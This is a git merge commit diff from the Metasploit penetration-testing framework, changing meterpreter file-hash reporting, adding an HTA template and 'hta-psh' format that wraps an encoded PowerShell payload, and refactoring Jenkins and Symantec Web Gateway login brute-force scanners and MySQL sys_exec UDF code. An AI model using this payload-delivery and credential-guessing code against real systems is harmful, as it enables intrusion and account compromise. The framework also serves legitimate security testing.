Merge branch 'master' into land-5339-sleep

Brent Cook · Brent Cook · commit fb3a2079f26b · 2015-05-15T18:00:52.000-05:00
diff --git a/data/meterpreter/ext_server_stdapi.php b/data/meterpreter/ext_server_stdapi.php
@@ -19,6 +19,7 @@
 define("TLV_TYPE_FILE_PATH",           TLV_META_TYPE_STRING  | 1202);
 define("TLV_TYPE_FILE_MODE",           TLV_META_TYPE_STRING  | 1203);
 define("TLV_TYPE_FILE_SIZE",           TLV_META_TYPE_UINT    | 1204);
+define("TLV_TYPE_FILE_HASH",           TLV_META_TYPE_RAW     | 1206);
 
 define("TLV_TYPE_STAT_BUF",            TLV_META_TYPE_COMPLEX | 1220);
 
@@ -533,8 +534,7 @@ function stdapi_fs_md5($req, &$pkt) {
         $md5 = md5(file_get_contents($path));
     }
     $md5 = pack("H*", $md5);
-    # Ghetto abuse of file name type to indicate the md5 result
-    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $md5));
     return ERROR_SUCCESS;
 }
 }
@@ -552,8 +552,7 @@ function stdapi_fs_sha1($req, &$pkt) {
         $sha1 = sha1(file_get_contents($path));
     }
     $sha1 = pack("H*", $sha1);
-    # Ghetto abuse of file name type to indicate the sha1 result
-    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $sha1));
     return ERROR_SUCCESS;
 }
 }
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
@@ -307,6 +307,7 @@ class RTATTR(ctypes.Structure):
 TLV_TYPE_FILE_PATH             = TLV_META_TYPE_STRING  | 1202
 TLV_TYPE_FILE_MODE             = TLV_META_TYPE_STRING  | 1203
 TLV_TYPE_FILE_SIZE             = TLV_META_TYPE_UINT    | 1204
+TLV_TYPE_FILE_HASH             = TLV_META_TYPE_RAW     | 1206
 
 TLV_TYPE_STAT_BUF              = TLV_META_TYPE_COMPLEX | 1220
 
@@ -1011,7 +1012,7 @@ def stdapi_fs_md5(request, response):
 		m = md5.new()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -1061,7 +1062,7 @@ def stdapi_fs_sha1(request, response):
 		m = sha.new()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	response += tlv_pack(TLV_TYPE_FILE_HASH, m.digest())
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
diff --git a/data/templates/scripts/to_powershell.hta.template b/data/templates/scripts/to_powershell.hta.template
@@ -0,0 +1,7 @@
+<script language="VBScript">
+  Set %{var_shell} = CreateObject("Wscript.Shell") 
+  Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
+  If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
+    %{var_shell}.Run "%{powershell}"
+  End If
+</script>
diff --git a/lib/metasploit/framework/login_scanner/jenkins.rb b/lib/metasploit/framework/login_scanner/jenkins.rb
@@ -17,6 +17,10 @@ def set_sane_defaults
           self.uri = "/j_acegi_security_check" if self.uri.nil?
           self.method = "POST" if self.method.nil?
 
+          if self.uri[0] != '/'
+            self.uri = "/#{self.uri}"
+          end
+
           super
         end
 
@@ -37,15 +41,15 @@ def attempt_login(credential)
             configure_http_client(cli)
             cli.connect
             req = cli.request_cgi({
-              'method'=>'POST',
-              'uri'=>'/j_acegi_security_check',
+              'method'=> method,
+              'uri'=> uri,
               'vars_post'=> {
                 'j_username' => credential.public,
-                'j_password'=>credential.private
+                'j_password'=> credential.private
                 }
             })
             res = cli.send_recv(req)
-            if res && !res.headers['location'].include?('loginError')
+            if res && res.headers['location'] && !res.headers['location'].include?('loginError')
               result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
             else
               result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
@@ -169,7 +169,7 @@ def report_note(opts={})
   # @option opts [String] :user The username for the cred
   # @option opts [String] :pass The private part of the credential (e.g. password)
   def report_auth_info(opts={})
-    print_error "*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!"
+    print_warning("*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!")
     return if not db
     raise ArgumentError.new("Missing required option :host") if opts[:host].nil?
     raise ArgumentError.new("Missing required option :port") if (opts[:port].nil? and opts[:service].nil?)
diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb
@@ -162,8 +162,9 @@ def mysql_upload_sys_udf(arch=:win32,target_path=nil)
   end
 
   def mysql_drop_and_create_sys_exec(soname)
-    res = mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
-    return false if res.nil?
+    # Just drop it. MySQL will always say "OK" anyway.
+    # See #5244
+    mysql_query("DROP FUNCTION IF EXISTS sys_exec")
 
     res = mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
     return false if res.nil?
diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
@@ -276,12 +276,15 @@ def generate_java_payload
     # @return [String] A string containing the bytes of the payload in the format selected
     def generate_payload
       if platform == "java" or arch == "java" or payload.start_with? "java/"
-        generate_java_payload
+        p = generate_java_payload
+        cli_print "Payload size: #{p.length} bytes"
+        p
       else
         raw_payload = generate_raw_payload
         raw_payload = add_shellcode(raw_payload)
         encoded_payload = encode_payload(raw_payload)
         encoded_payload = prepend_nops(encoded_payload)
+        cli_print "Payload size: #{encoded_payload.length} bytes"
         format_payload(encoded_payload)
       end
     end
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -1117,6 +1117,29 @@ def self.to_powershell_command(framework, arch, code)
                     method: 'reflection')
   end
 
+  def self.to_powershell_hta(framework, arch, code)
+    template_path = File.join(Msf::Config.data_directory,
+                              "templates",
+                              "scripts")
+
+    powershell = Rex::Powershell::Command.cmd_psh_payload(code,
+                    arch,
+                    template_path,
+                    encode_final_payload: true,
+                    remove_comspec: true,
+                    method: 'reflection')
+
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:var_shell)
+    rig.init_var(:var_fso)
+
+    hash_sub = rig.to_h
+    hash_sub[:powershell] = powershell
+
+    read_replace_script_template("to_powershell.hta.template", hash_sub)
+  end
+
   def self.to_win32pe_vbs(framework, code, opts = {})
     to_exe_vbs(to_win32pe(framework, code, opts), opts)
   end
@@ -1928,6 +1951,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
       Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
     when 'psh-cmd'
       Msf::Util::EXE.to_powershell_command(framework, arch, code)
+    when 'hta-psh'
+      Msf::Util::EXE.to_powershell_hta(framework, arch, code)
     end
   end
 
@@ -1943,6 +1968,7 @@ def self.to_executable_fmt_formats
       "exe-only",
       "exe-service",
       "exe-small",
+      "hta-psh",
       "loop-vbs",
       "macho",
       "msi",
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -152,8 +152,10 @@ def File.md5(path)
 
     response = client.send_request(request)
 
-    # This is not really a file name, but a raw hash in bytes
-    return response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    # older meterpreter binaries will send FILE_NAME containing the hash
+    hash = response.get_tlv_value(TLV_TYPE_FILE_HASH) ||
+      response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    return hash
   end
 
   #
@@ -166,8 +168,10 @@ def File.sha1(path)
 
     response = client.send_request(request)
 
-    # This is not really a file name, but a raw hash in bytes
-    return response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    # older meterpreter binaries will send FILE_NAME containing the hash
+    hash = response.get_tlv_value(TLV_TYPE_FILE_HASH) ||
+      response.get_tlv_value(TLV_TYPE_FILE_NAME)
+    return hash
   end
 
   #
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -30,6 +30,7 @@ module Stdapi
 TLV_TYPE_FILE_MODE          = TLV_META_TYPE_STRING  | 1203
 TLV_TYPE_FILE_SIZE          = TLV_META_TYPE_UINT    | 1204
 TLV_TYPE_FILE_SHORT_NAME    = TLV_META_TYPE_STRING  | 1205
+TLV_TYPE_FILE_HASH          = TLV_META_TYPE_RAW     | 1206
 
 TLV_TYPE_STAT_BUF           = TLV_META_TYPE_COMPLEX | 1220
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -81,7 +81,7 @@ def commands
       c["migrate"] = "Migrate the server to another process"
 
       # UUID functionality isn't yet available on other platforms
-      c["uuid"] = "Get the UUID for the current session",
+      c["uuid"] = "Get the UUID for the current session"
 
       # Yet to implement transport hopping for other meterpreters.
       # Works for posix and native windows though.
diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb b/modules/auxiliary/scanner/http/jenkins_login.rb
@@ -23,6 +23,8 @@ def initialize
 
     register_options(
       [
+        OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/j_acegi_security_check']),
+        OptEnum.new('HTTP_METHOD', [true, 'The HTTP method to use for the login', 'POST', ['GET', 'POST']]),
         Opt::RPORT(8080)
       ], self.class)
 
@@ -44,6 +46,8 @@ def run_host(ip)
 
     scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
       configure_http_login_scanner(
+        uri: datastore['LOGIN_URL'],
+        method: datastore['HTTP_METHOD'],
         cred_details: cred_collection,
         stop_on_success: datastore['STOP_ON_SUCCESS'],
         bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb
@@ -32,33 +32,32 @@ def initialize(info={})
   end
 
 
-  # Initializes CredentialCollection and SymantecWebGateway
-  def init(ip)
-    @cred_collection = Metasploit::Framework::CredentialCollection.new(
-      blank_passwords: datastore['BLANK_PASSWORDS'],
-      pass_file:       datastore['PASS_FILE'],
-      password:        datastore['PASSWORD'],
-      user_file:       datastore['USER_FILE'],
-      userpass_file:   datastore['USERPASS_FILE'],
-      username:        datastore['USERNAME'],
-      user_as_pass:    datastore['USER_AS_PASS']
-    )
-
-    @scanner = Metasploit::Framework::LoginScanner::SymantecWebGateway.new(
-      configure_http_login_scanner(
-        host: ip,
-        port: datastore['RPORT'],
-        cred_details:       @cred_collection,
-        stop_on_success:    datastore['STOP_ON_SUCCESS'],
-        bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
-        connection_timeout: 5
+  def scanner(ip)
+    @scanner ||= lambda {
+      cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file:       datastore['PASS_FILE'],
+        password:        datastore['PASSWORD'],
+        user_file:       datastore['USER_FILE'],
+        userpass_file:   datastore['USERPASS_FILE'],
+        username:        datastore['USERNAME'],
+        user_as_pass:    datastore['USER_AS_PASS']
       )
-    )
-  end
+
+      return Metasploit::Framework::LoginScanner::SymantecWebGateway.new(
+        configure_http_login_scanner(
+          host: ip,
+          port: datastore['RPORT'],
+          cred_details:       cred_collection,
+          stop_on_success:    datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
+          connection_timeout: 5
+        ))
+    }.call
+end
 
 
-  # Reports a good login credential
-  def do_report(ip, port, result)
+  def report_good_cred(ip, port, result)
     service_data = {
       address: ip,
       port: port,
@@ -86,49 +85,43 @@ def do_report(ip, port, result)
   end
 
 
+  def report_bad_cred(ip, rport, result)
+    invalidate_login(
+      address: ip,
+      port: rport,
+      protocol: 'tcp',
+      public: result.credential.public,
+      private: result.credential.private,
+      realm_key: result.credential.realm_key,
+      realm_value: result.credential.realm,
+      status: result.status,
+      proof: result.proof
+    )
+  end
+
+
   # Attempts to login
   def bruteforce(ip)
-    @scanner.scan! do |result|
+    scanner(ip).scan! do |result|
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
-        do_report(ip, rport, result)
+        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
+        report_good_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        vprint_brute :level => :verror, :ip => ip, :msg => result.proof
-        invalidate_login(
-            address: ip,
-            port: rport,
-            protocol: 'tcp',
-            public: result.credential.public,
-            private: result.credential.private,
-            realm_key: result.credential.realm_key,
-            realm_value: result.credential.realm,
-            status: result.status,
-            proof: result.proof
-        )
+        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
+        report_bad_cred(ip, rport, result)
       when Metasploit::Model::Login::Status::INCORRECT
-        vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
-        invalidate_login(
-            address: ip,
-            port: rport,
-            protocol: 'tcp',
-            public: result.credential.public,
-            private: result.credential.private,
-            realm_key: result.credential.realm_key,
-            realm_value: result.credential.realm,
-            status: result.status,
-            proof: result.proof
-        )
+        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
+        report_bad_cred(ip, rport, result)
       end
     end
   end
 
 
   # Start here
   def run_host(ip)
-    init(ip)
-    unless @scanner.check_setup
-      print_brute :level => :error, :ip => ip, :msg => 'Target is not Symantec Web Gateway'
+    unless scanner(ip).check_setup
+      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Symantec Web Gateway')
       return
     end
 
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb
diff --git a/tools/dev/import-dev-keys.sh b/tools/dev/import-dev-keys.sh

Original file line number	Diff line number	Diff line change
`@@ -19,6 +19,7 @@`
`19`	`19`	`define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING \| 1202);`
`20`	`20`	`define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING \| 1203);`
`21`	`21`	`define("TLV_TYPE_FILE_SIZE", TLV_META_TYPE_UINT \| 1204);`
	`22`	`+define("TLV_TYPE_FILE_HASH", TLV_META_TYPE_RAW \| 1206);`
`22`	`23`
`23`	`24`	`define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX \| 1220);`
`24`	`25`
`@@ -533,8 +534,7 @@ function stdapi_fs_md5($req, &$pkt) {`
`533`	`534`	`$md5 = md5(file_get_contents($path));`
`534`	`535`	`}`
`535`	`536`	`$md5 = pack("H*", $md5);`
`536`		`- # Ghetto abuse of file name type to indicate the md5 result`
`537`		`- packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));`
	`537`	`+ packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $md5));`
`538`	`538`	`return ERROR_SUCCESS;`
`539`	`539`	`}`
`540`	`540`	`}`
`@@ -552,8 +552,7 @@ function stdapi_fs_sha1($req, &$pkt) {`
`552`	`552`	`$sha1 = sha1(file_get_contents($path));`
`553`	`553`	`}`
`554`	`554`	`$sha1 = pack("H*", $sha1);`
`555`		`- # Ghetto abuse of file name type to indicate the sha1 result`
`556`		`- packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));`
	`555`	`+ packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_HASH, $sha1));`
`557`	`556`	`return ERROR_SUCCESS;`
`558`	`557`	`}`
`559`	`558`	`}`